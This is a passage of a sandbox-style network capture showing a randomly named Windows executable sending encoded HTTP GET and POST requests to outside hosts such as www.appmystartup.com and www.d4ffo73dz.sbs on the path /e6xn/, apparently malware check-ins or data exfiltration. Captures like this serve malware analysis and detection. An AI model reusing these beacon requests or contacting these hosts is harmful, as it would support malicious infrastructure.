                                                                                  Data Raw: 31 0a
                                                                                  Data Ascii: 1


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.104971947.76.88.64806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:32.650840998 CET499OUTGET /e6xn/?bvOt=CBgiEcAQTvmtp6KW0R4Z7j3tS9oH+Sd4wWgtDPe8rtmYg/trD2DMciPVEqfGjRspk89YWIqewcapqz5yHVGzQ5KlflxjVuoMuuz+sMTok+5fFnqu2w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.d4ffo73dz.sbs
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:46:32.960242033 CET224INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:46:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 2
                                                                                  Last-Modified: Wed, 31 Jan 2024 07:34:05 GMT
                                                                                  Connection: close
                                                                                  ETag: "65b9f7ed-2"
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 31 0a
                                                                                  Data Ascii: 1


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.1049721144.76.75.181806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:38.541470051 CET763OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.appmystartup.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.appmystartup.com
                                                                                  Referer: http://www.appmystartup.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 77 4d 4d 61 30 74 45 76 4c 48 57 61 43 49 33 6b 62 4b 6a 55 69 6f 39 53 5a 2b 7a 50 36 68 76 49 47 6f 55 5a 66 74 6b 79 50 7a 66 44 48 33 65 30 39 4e 76 48 4b 39 74 52 71 55 47 49 77 59 61 78 57 44 47 47 71 66 43 2f 4f 36 38 71 68 74 65 73 47 76 68 70 37 2b 53 57 71 74 42 62 65 55 6d 58 73 61 4e 50 49 6c 51 35 4d 58 6c 37 58 5a 6f 34 49 51 76 59 72 76 34 68 53 36 43 43 73 79 62 65 7a 72 7a 53 33 66 64 4e 4c 30 73 79 4d 69 45 31 4d 43 54 58 54 57 65 64 39 33 70 44 68 63 2b 77 6e 6b 63 46 4e 75 41 6c 77 64 43 6b 4d 41 43 48 53 76 36 46 62 33 6b 53 47 5a 4d 66
                                                                                  Data Ascii: bvOt=wMMa0tEvLHWaCI3kbKjUio9SZ+zP6hvIGoUZftkyPzfDH3e09NvHK9tRqUGIwYaxWDGGqfC/O68qhtesGvhp7+SWqtBbeUmXsaNPIlQ5MXl7XZo4IQvYrv4hS6CCsybezrzS3fdNL0syMiE1MCTXTWed93pDhc+wnkcFNuAlwdCkMACHSv6Fb3kSGZMf
                                                                                  Mar 18, 2024 14:46:38.716084957 CET1286INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1163
                                                                                  date: Mon, 18 Mar 2024 13:46:38 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc.
                                                                                  Mar 18, 2024 14:46:38.716103077 CET115INData Raw: 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68
                                                                                  Data Ascii: is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.1049722144.76.75.181806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:41.234544992 CET787OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.appmystartup.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.appmystartup.com
                                                                                  Referer: http://www.appmystartup.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 77 4d 4d 61 30 74 45 76 4c 48 57 61 45 59 48 6b 59 70 4c 55 71 6f 39 52 57 65 7a 50 73 52 76 4d 47 6f 49 5a 66 75 70 33 50 6d 33 44 48 54 53 30 38 50 58 48 4c 39 74 52 69 30 47 33 39 34 61 6d 57 44 4b 67 71 62 4b 2f 4f 36 6f 71 68 73 75 73 47 38 35 71 37 75 53 55 6a 4e 42 6a 44 6b 6d 58 73 61 4e 50 49 6c 46 69 4d 58 74 37 51 73 67 34 49 30 7a 66 6f 76 34 69 58 36 43 43 39 69 62 61 7a 72 7a 30 33 61 46 33 4c 79 6f 79 4d 6e 34 31 4d 54 54 55 64 57 65 62 7a 58 6f 74 74 4a 4c 72 75 48 73 2f 46 66 41 76 6c 76 65 64 43 42 6a 41 44 2b 62 53 49 41 34 63 49 66 35 31 6e 56 67 30 6e 72 33 55 58 6e 54 38 65 35 4a 36 48 51 50 64 7a 67 3d 3d
                                                                                  Data Ascii: bvOt=wMMa0tEvLHWaEYHkYpLUqo9RWezPsRvMGoIZfup3Pm3DHTS08PXHL9tRi0G394amWDKgqbK/O6oqhsusG85q7uSUjNBjDkmXsaNPIlFiMXt7Qsg4I0zfov4iX6CC9ibazrz03aF3LyoyMn41MTTUdWebzXottJLruHs/FfAvlvedCBjAD+bSIA4cIf51nVg0nr3UXnT8e5J6HQPdzg==
                                                                                  Mar 18, 2024 14:46:41.409279108 CET1286INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1163
                                                                                  date: Mon, 18 Mar 2024 13:46:41 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc.
                                                                                  Mar 18, 2024 14:46:41.409295082 CET115INData Raw: 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68
                                                                                  Data Ascii: is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.1049723144.76.75.181806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:46:44.686347008 CET1800OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.appmystartup.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.appmystartup.com
                                                                                  Referer: http://www.appmystartup.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 77 4d 4d 61 30 74 45 76 4c 48 57 61 45 59 48 6b 59 70 4c 55 71 6f 39 52 57 65 7a 50 73 52 76 4d 47 6f 49 5a 66 75 70 33 50 6d 76 44 47 6d 4f 30 39 75 58 48 5a 74 74 52 73 55 47 4d 39 34 61 37 57 44 69 6b 71 62 47 56 4f 34 51 71 6e 4b 36 73 53 64 35 71 78 75 53 55 68 4e 42 59 65 55 6e 44 73 61 63 47 49 6c 56 69 4d 58 74 37 51 74 51 34 50 67 76 66 6c 50 34 68 53 36 43 57 73 79 62 79 7a 76 65 50 33 62 78 6e 4c 43 49 79 4e 48 49 31 4f 68 72 55 56 57 65 5a 2b 33 6f 44 74 4a 50 4f 75 47 41 5a 46 66 30 52 6c 74 4f 64 41 51 50 64 57 4b 65 4f 55 69 34 47 47 4f 70 77 74 68 6b 49 6c 2f 65 2f 42 45 61 67 64 4e 49 64 50 54 6d 57 68 36 56 41 77 76 35 43 53 66 72 6a 31 66 34 6a 69 5a 57 42 76 72 5a 57 42 57 48 6e 69 76 77 78 50 70 48 7a 51 4e 6d 37 64 6f 46 2f 35 4f 49 53 71 72 76 33 4b 59 4b 39 41 69 75 4b 4d 38 67 75 2b 41 58 6e 73 4e 65 2f 52 75 38 4c 57 39 6f 7a 2b 69 43 59 48 4b 4d 4f 6c 31 30 71 31 5a 36 4d 2f 61 59 51 77 62 58 56 2f 34 45 33 73 35 6c 38 34 4a 54 39 44 74 69 63 33 41 42 65 71 43 43 59 33 72 51 72 51 52 69 71 33 35 54 55 2f 31 62 6d 39 38 2f 77 69 6b 6a 61 50 63 45 31 71 66 45 37 59 45 62 70 6a 46 4c 75 6c 58 67 48 74 43 6b 6e 35 36 56 59 50 77 4a 44 2b 62 41 49 6c 78 67 34 52 55 5a 64 61 75 42 49 58 6d 78 59 57 6e 6c 71 38 4b 7a 47 4a 55 6f 66 55 67 44 53 6a 50 4f 77 43 51 43 41 5a 73 6b 35 52 61 64 6d 72 4a 74 64 79 74 68 59 6e 59 48 76 46 62 44 67 38 4f 46 6d 49 61 53 6d 62 54 39 78 6f 47 6b 52 4f 4e 41 6c 59 65 6c 49 56 62 6b 75 6d 69 67 46 56 49 41 30 74 6d 35 6f 6f 44 56 72 34 63 78 49 68 4d 52 6e 7a 2f 77 7a 74 39 78 47 34 53 34 51 6a 6e 70 4e 65 4d 45 59 47 48 66 58 59 6a 65 4c 2f 68 61 47 66 77 79 6c 66 33 64 44 69 56 7a 51 53 4c 4e 58 30 54 69 71 48 79 6e 45 36 50 75 31 54 6e 6c 2f 59 35 39 6a 6a 74 77 4c 42 69 6f 4b 65 39 47 41 35 4e 48 4d 46 31 6c 63 64 36 65 7a 4a 50 4b 2b 61 78 44 39 53 5a 47 4a 77 62 59 38 30 4e 73 31 53 35 49 2f 67 46 73 72 71 44 4b 43 6a 50 58 77 45 58 45 46 78 4f 6e 78 79 4f 77 6d 41 34 4f 4f 77 38 5a 48 33 33 66 73 38 4f 43 6b 74 41 6c 73 4a 32 69 50 5a 64 42 75 6e 6b 55 76 37 2b 46 61 2b 45 48 6c 47 45 63 47 67 30 63 65 52 34 66 69 62 73 33 46 4e 42 51 2f 78 44 49 44 72 39 58 74 31 31 4e 75 53 70 44 31 36 67 74 4b 55 45 75 74 5a 33 71 4a 56 7a 4e 35 75 38 45 54 52 6d 6d 2b 31 7a 67 6f 44 47 63 78 54 76 53 4c 44 70 63 71 37 47 4e 34 47 49 63 4e 76 63 42 70 31 46 4f 38 68 57 57 54 58 48 4e 33 4f 4b 36 71 47 71 35 51 49 53 42 46 73 6a 69 49 77 36 59 6a 59 73 46 4c 31 2b 52 63 66 41 73 50 50 64 44 41 4e 49 51 2b 42 4d 33 52 6e 4b 6b 49 5a 62 6b 6e 55 38 58 75 61 63 6a 77 2b 6a 5a 54 36 6e 4a 4a 4e 33 57 58 4b 6c 32 76 58 37 4d 2b 41 77 6f 69 39 34 69 50 45 5a 4a 66 65 66 4d 62 4d 6c 35 4f 73 52 6d 45 59 34 42 61 63 47 33 6e 6f 42 30 39 65 78 43 76 77 69 64 78 57 78 44 4a 57 43 41 45 49 5a 73 2f 69 36 6e 6d 6b 4f 75 59 57 62 42 54 76 37 54 42 4c 79 75 70 63 69 49 71 6b 6f 5a 38 65 30 62 73 4a 6f 74 7a 6f 61 6d 32 6f 32 6d 52 75 66 37 4e 52 6d 32 6c 36 4a 54 2b 47 70 34 6c 6f 52 4d 54 65 51 56 65 65 33 6d 50 78 32 32 50 74 65 67 6d 44 64 4b 36 4b 4f 33 56 57 6c 5a 4d 6f 6f 78 4b 59 34 55 4f 57 67 64 68 76 33 49 4f 73 7a 6e 50 43 61 43 39 36 6f 43 70 64 4e 55 69 35 6b 6a 50 49 79 51 56 55 61 72 6d 76 70 77 59 67 35 6b 4b 35 77 53 6b 4b 69 44 77 43 2f 4a 61 66 49 79 6e 6f 42 70 74 55 7a 76 6c 51 4a 63 57 48 72 32 68 72 75 48 74 5a 59 78 6c 71 58 4b 44 54 63 53 70 55 71 70 4d 50 43 2b 79 74 52 55 56 79 48 70 32 77 54 67 44 67 2f 63 70 35 58 48 33 79 69 47 70 2f 4a 75 76 34 4f 67 4e 68 4f 6a 45 44 4b 69 46 34 70 50 4e 31 4c 6f 6b 7a 6c 6d 50 64 76 6e 6b 49 2f 58 4a 35 4e 35 54 37 37 46 75 4b 79 67 72 77 31 64 5a 65 64 77 45 71 55 36 37 45 6a 6b 76 52 38 49 66 7a 7a 49 3d
                                                                                  Data Ascii: bvOt=wMMa0tEvLHWaEYHkYpLUqo9RWezPsRvMGoIZfup3PmvDGmO09uXHZttRsUGM94a7WDikqbGVO4QqnK6sSd5qxuSUhNBYeUnDsacGIlViMXt7QtQ4PgvflP4hS6CWsybyzveP3bxnLCIyNHI1OhrUVWeZ+3oDtJPOuGAZFf0RltOdAQPdWKeOUi4GGOpwthkIl/e/BEagdNIdPTmWh6VAwv5CSfrj1f4jiZWBvrZWBWHnivwxPpHzQNm7doF/5OISqrv3KYK9AiuKM8gu+AXnsNe/Ru8LW9oz+iCYHKMOl10q1Z6M/aYQwbXV/4E3s5l84JT9Dtic3ABeqCCY3rQrQRiq35TU/1bm98/wikjaPcE1qfE7YEbpjFLulXgHtCkn56VYPwJD+bAIlxg4RUZdauBIXmxYWnlq8KzGJUofUgDSjPOwCQCAZsk5RadmrJtdythYnYHvFbDg8OFmIaSmbT9xoGkRONAlYelIVbkumigFVIA0tm5ooDVr4cxIhMRnz/wzt9xG4S4QjnpNeMEYGHfXYjeL/haGfwylf3dDiVzQSLNX0TiqHynE6Pu1Tnl/Y59jjtwLBioKe9GA5NHMF1lcd6ezJPK+axD9SZGJwbY80Ns1S5I/gFsrqDKCjPXwEXEFxOnxyOwmA4OOw8ZH33fs8OCktAlsJ2iPZdBunkUv7+Fa+EHlGEcGg0ceR4fibs3FNBQ/xDIDr9Xt11NuSpD16gtKUEutZ3qJVzN5u8ETRmm+1zgoDGcxTvSLDpcq7GN4GIcNvcBp1FO8hWWTXHN3OK6qGq5QISBFsjiIw6YjYsFL1+RcfAsPPdDANIQ+BM3RnKkIZbknU8Xuacjw+jZT6nJJN3WXKl2vX7M+Awoi94iPEZJfefMbMl5OsRmEY4BacG3noB09exCvwidxWxDJWCAEIZs/i6nmkOuYWbBTv7TBLyupciIqkoZ8e0bsJotzoam2o2mRuf7NRm2l6JT+Gp4loRMTeQVee3mPx22PtegmDdK6KO3VWlZMooxKY4UOWgdhv3IOsznPCaC96oCpdNUi5kjPIyQVUarmvpwYg5kK5wSkKiDwC/JafIynoBptUzvlQJcWHr2hruHtZYxlqXKDTcSpUqpMPC+ytRUVyHp2wTgDg/cp5XH3yiGp/Juv4OgNhOjEDKiF4pPN1LokzlmPdvnkI/XJ5N5T77FuKygrw1dZedwEqU67EjkvR8IfzzI=
                                                                                  Mar 18, 2024 14:46:44.860944986 CET1286INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1163
                                                                                  date: Mon, 18 Mar 2024 13:46:44 GMT
                                                                                  server: LiteSpeed
